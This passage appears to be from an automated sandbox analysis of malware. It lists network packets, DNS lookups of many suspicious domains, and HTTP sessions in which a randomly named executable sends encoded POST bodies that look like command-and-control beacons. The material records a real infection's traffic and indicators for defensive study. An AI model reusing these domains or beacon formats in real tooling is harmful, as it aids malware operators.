                                                                                                                      Nov 1, 2024 09:20:45.990282059 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990309954 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990338087 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990364075 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990396023 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990422964 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584163904 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584322929 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584377050 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:46.584707022 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584754944 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:47.490987062 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.517358065 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.522377014 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:48.522485018 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.531167984 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.536046028 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147416115 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147475958 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147625923 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147633076 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.147697926 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.151361942 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.156243086 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:54.793437004 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.798284054 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:54.800436974 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.826970100 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.831895113 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:56.334842920 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:56.340203047 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:56.340262890 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.356167078 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.361100912 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:57.365080118 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.385008097 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.389843941 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:58.897358894 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:58.902918100 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:58.903022051 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.952436924 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.957478046 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.957554102 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.969888926 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.974813938 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974843025 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974885941 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974922895 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974946022 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975059986 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975083113 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975128889 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975164890 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:02.477010965 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:02.482379913 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:02.482613087 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.845685005 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.850677967 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:03.850806952 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.859931946 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.864804029 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.510509968 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.553473949 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:05.748033047 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.748090029 CET6294680192.168.2.4103.233.82.58

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 1, 2024 09:17:43.125149012 CET5364644162.159.36.2192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:43.833167076 CET53613351.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:51.394399881 CET6210853192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:17:51.407012939 CET53621081.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.031513929 CET5945953192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:18:08.042751074 CET53594591.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:21.432280064 CET6246853192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:18:22.154028893 CET53624681.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:37.197382927 CET5681753192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:18:37.206986904 CET53568171.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:45.260510921 CET5550853192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:18:45.278646946 CET53555081.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:59.513475895 CET4956753192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:18:59.527650118 CET53495671.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:15.809192896 CET6332853192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:19:15.985133886 CET53633281.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:30.053818941 CET5987053192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:19:31.053538084 CET5987053192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:19:31.539635897 CET53598701.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:31.539650917 CET53598701.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:45.354368925 CET5378453192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:19:45.366729021 CET53537841.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:58.906740904 CET4965653192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:19:58.967679024 CET53496561.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:12.759524107 CET5991353192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:20:12.841270924 CET53599131.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:26.525696993 CET6286253192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:20:27.071042061 CET53628621.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:40.744991064 CET6222053192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:20:40.823836088 CET53622201.1.1.1192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:54.168627024 CET5883353192.168.2.41.1.1.1
                                                                                                                      Nov 1, 2024 09:20:54.779886007 CET53588331.1.1.1192.168.2.4

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 1, 2024 09:17:51.394399881 CET192.168.2.41.1.1.10x164Standard query (0)www.litsgs.vipA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:08.031513929 CET192.168.2.41.1.1.10x564eStandard query (0)www.7wkto5nk230724z.clickA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:21.432280064 CET192.168.2.41.1.1.10x9fStandard query (0)www.roopiedutech.onlineA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:37.197382927 CET192.168.2.41.1.1.10x90b4Standard query (0)www.abistra.storeA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:45.260510921 CET192.168.2.41.1.1.10x18b4Standard query (0)www.suree.betA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:59.513475895 CET192.168.2.41.1.1.10xc52cStandard query (0)www.bocadolobopetra.netA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:15.809192896 CET192.168.2.41.1.1.10xde44Standard query (0)www.44kdd.topA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:30.053818941 CET192.168.2.41.1.1.10xa259Standard query (0)www.dbasky.netA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:31.053538084 CET192.168.2.41.1.1.10xa259Standard query (0)www.dbasky.netA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:45.354368925 CET192.168.2.41.1.1.10x4c96Standard query (0)www.zoptra.infoA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:58.906740904 CET192.168.2.41.1.1.10x347dStandard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:12.759524107 CET192.168.2.41.1.1.10xfb93Standard query (0)www.redex.funA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:26.525696993 CET192.168.2.41.1.1.10x43abStandard query (0)www.broork.sbsA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:40.744991064 CET192.168.2.41.1.1.10xe3dfStandard query (0)www.deepfy.xyzA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:54.168627024 CET192.168.2.41.1.1.10x59cdStandard query (0)www.cmdh1c.xyzA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 1, 2024 09:17:51.407012939 CET1.1.1.1192.168.2.40x164No error (0)www.litsgs.viplitsgs.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:17:51.407012939 CET1.1.1.1192.168.2.40x164No error (0)litsgs.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:17:51.407012939 CET1.1.1.1192.168.2.40x164No error (0)litsgs.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:08.042751074 CET1.1.1.1192.168.2.40x564eNo error (0)www.7wkto5nk230724z.click172.67.131.32A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:08.042751074 CET1.1.1.1192.168.2.40x564eNo error (0)www.7wkto5nk230724z.click104.21.3.193A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:22.154028893 CET1.1.1.1192.168.2.40x9fNo error (0)www.roopiedutech.onlineroopiedutech.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:22.154028893 CET1.1.1.1192.168.2.40x9fNo error (0)roopiedutech.online103.191.208.137A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:37.206986904 CET1.1.1.1192.168.2.40x90b4Name error (3)www.abistra.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:45.278646946 CET1.1.1.1192.168.2.40x18b4No error (0)www.suree.betsuree.betCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:45.278646946 CET1.1.1.1192.168.2.40x18b4No error (0)suree.bet3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:45.278646946 CET1.1.1.1192.168.2.40x18b4No error (0)suree.bet15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:59.527650118 CET1.1.1.1192.168.2.40xc52cNo error (0)www.bocadolobopetra.netbocadolobopetra.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:59.527650118 CET1.1.1.1192.168.2.40xc52cNo error (0)bocadolobopetra.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:18:59.527650118 CET1.1.1.1192.168.2.40xc52cNo error (0)bocadolobopetra.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:15.985133886 CET1.1.1.1192.168.2.40xde44No error (0)www.44kdd.top44kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:15.985133886 CET1.1.1.1192.168.2.40xde44No error (0)44kdd.top38.47.232.160A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:31.539635897 CET1.1.1.1192.168.2.40xa259No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:31.539650917 CET1.1.1.1192.168.2.40xa259No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:45.366729021 CET1.1.1.1192.168.2.40x4c96No error (0)www.zoptra.info162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:58.967679024 CET1.1.1.1192.168.2.40x347dNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:58.967679024 CET1.1.1.1192.168.2.40x347dNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:12.841270924 CET1.1.1.1192.168.2.40xfb93No error (0)www.redex.fun185.68.16.94A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:27.071042061 CET1.1.1.1192.168.2.40x43abNo error (0)www.broork.sbs163.44.176.12A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:40.823836088 CET1.1.1.1192.168.2.40xe3dfNo error (0)www.deepfy.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:54.779886007 CET1.1.1.1192.168.2.40x59cdNo error (0)www.cmdh1c.xyzofficial.roamimg.strawberrycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:54.779886007 CET1.1.1.1192.168.2.40x59cdNo error (0)official.roamimg.strawberrycdn.com103.233.82.58A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.litsgs.vip
                                                                                                                      • www.7wkto5nk230724z.click
                                                                                                                      • www.roopiedutech.online
                                                                                                                      • www.suree.bet
                                                                                                                      • www.bocadolobopetra.net
                                                                                                                      • www.44kdd.top
                                                                                                                      • www.dbasky.net
                                                                                                                      • www.zoptra.info
                                                                                                                      • www.nutrigenfit.online
                                                                                                                      • www.redex.fun
                                                                                                                      • www.broork.sbs
                                                                                                                      • www.deepfy.xyz
                                                                                                                      • www.cmdh1c.xyz

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.4626333.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:17:51.431792974 CET527OUTGET /a1y9/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.litsgs.vip
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:17:52.985616922 CET403INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:17:52 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 5a 61 3d 6a 70 67 44 4f 56 48 38 50 58 57 38 6f 42 41 30 26 73 6e 30 50 4c 4e 3d 69 5a 7a 34 49 33 57 35 69 4c 4a 47 66 62 74 47 6d 5a 32 43 4f 62 77 66 42 79 42 69 72 6f 4a 64 64 7a 64 47 75 56 55 47 72 35 66 64 56 50 2f 6d 55 2f 67 68 50 44 6d 7a 55 79 4f 56 4a 7a 41 62 4a 67 55 30 75 65 4f 39 42 46 65 71 53 6b 79 79 66 7a 37 36 79 69 53 47 36 35 45 44 6a 39 72 4a 73 6a 5a 2f 75 44 43 74 73 55 56 54 38 53 70 37 65 52 62 64 77 4c 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE="}</script></head></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.462694172.67.131.32803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:08.061456919 CET811OUTPOST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 59 56 5a 74 59 59 4e 6d 51 77 4a 6d 35 6a 73 6a 7a 75 67 79 4c 4a 66 6b 6b 42 50 79 50 73 63 43 57 31 74 55 6f 31 74 73 53 50 52 4f 59 64 52 2f 63 47 61 77 77 78 5a 4f 37 59 51 74 62 2b 73 52 37 31 52 31 5a 35 78 64 30 4c 36 68 74 59 6a 58 41 30 57 42 57 43 73 77 33 77 74 79 6d 61 6b 66 76 73 7a 30 75 6b 67 55 41 73 6f 4f 75 6a 4c 57 44 71 31 45 68 46 71 7a 79 6a 4d 4d 44 72 74 76 52 73 74 58 6d 6f 2b 57 41 42 4b 55 72 4e 34 6e 57 4c 35 31 50 51 4b 6a 67 67 33 51 61 34 4c 6c 42 64 71 6b 68 70 57 45 67 53 53 33 44 77 41 66 39 43 79 2b 67 3d 3d
                                                                                                                      Data Ascii: sn0PLN=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
                                                                                                                      Nov 1, 2024 09:18:08.753097057 CET797INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:08 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qwz%2F9cMho692HHhfSsYXNYedg5oMgLa6LGMSoRh%2BGZPzwY8fJEjexmpmjQFVeKGq3AcIDUAit2DjHuM1w3Uko3Zj0%2FeSV2YVIy0dM33dOwEVL2XciBb1VeojOGNnGpNEBdWmDZXlU5QG5SX"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73d3aa426bd2-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                                      Data Ascii: f
                                                                                                                      Nov 1, 2024 09:18:08.753145933 CET105INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                                                      Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                                                      Nov 1, 2024 09:18:08.753165007 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.462710172.67.131.32803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:10.603519917 CET831OUTPOST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 35 46 5a 75 2f 73 4e 6b 77 77 4f 34 70 6a 73 73 54 75 6b 79 4c 46 66 6b 6c 30 45 78 39 49 63 42 7a 52 74 56 73 5a 74 35 53 50 52 47 34 64 4a 31 38 47 42 77 77 30 6b 4f 36 6b 51 74 62 36 73 52 2b 5a 52 31 75 56 77 50 55 4b 63 30 39 5a 46 59 67 30 57 42 57 43 73 77 33 31 6c 79 6d 69 6b 66 66 63 7a 33 4d 4d 6e 61 67 73 6e 47 4f 6a 4c 63 6a 71 78 45 68 46 59 7a 77 58 6d 4d 46 6e 74 76 51 63 74 55 7a 63 2f 59 41 42 45 61 4c 4d 30 6f 57 75 6a 31 2b 56 6c 6e 6a 6c 58 64 61 6f 4f 67 48 51 77 31 51 49 42 57 67 32 68 71 45 35 30 53 2b 2f 37 6c 6f 30 72 33 54 33 75 71 61 45 62 6d 6c 49 6b 57 4b 30 4d 6e 53 55 3d
                                                                                                                      Data Ascii: sn0PLN=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9IcBzRtVsZt5SPRG4dJ18GBww0kO6kQtb6sR+ZR1uVwPUKc09ZFYg0WBWCsw31lymikffcz3MMnagsnGOjLcjqxEhFYzwXmMFntvQctUzc/YABEaLM0oWuj1+VlnjlXdaoOgHQw1QIBWg2hqE50S+/7lo0r3T3uqaEbmlIkWK0MnSU=
                                                                                                                      Nov 1, 2024 09:18:11.271150112 CET803INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:11 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdwCCaDy487UPnK0%2BGuRiSu6SDyj8p7yfiZVef6pMZRhenlKR%2BYs70%2B6O73FMIBG71Qlbg4sjiMqIrdRPG%2FrZD%2BSNUHoQg5%2FH6D05STBYE0ZZDmy8Rk0TIumR2phO8BKBWrdfy5WtZ0us2XL"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73e389eb461a-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                                      Data Ascii: f
                                                                                                                      Nov 1, 2024 09:18:11.271291018 CET110INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                                                      Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
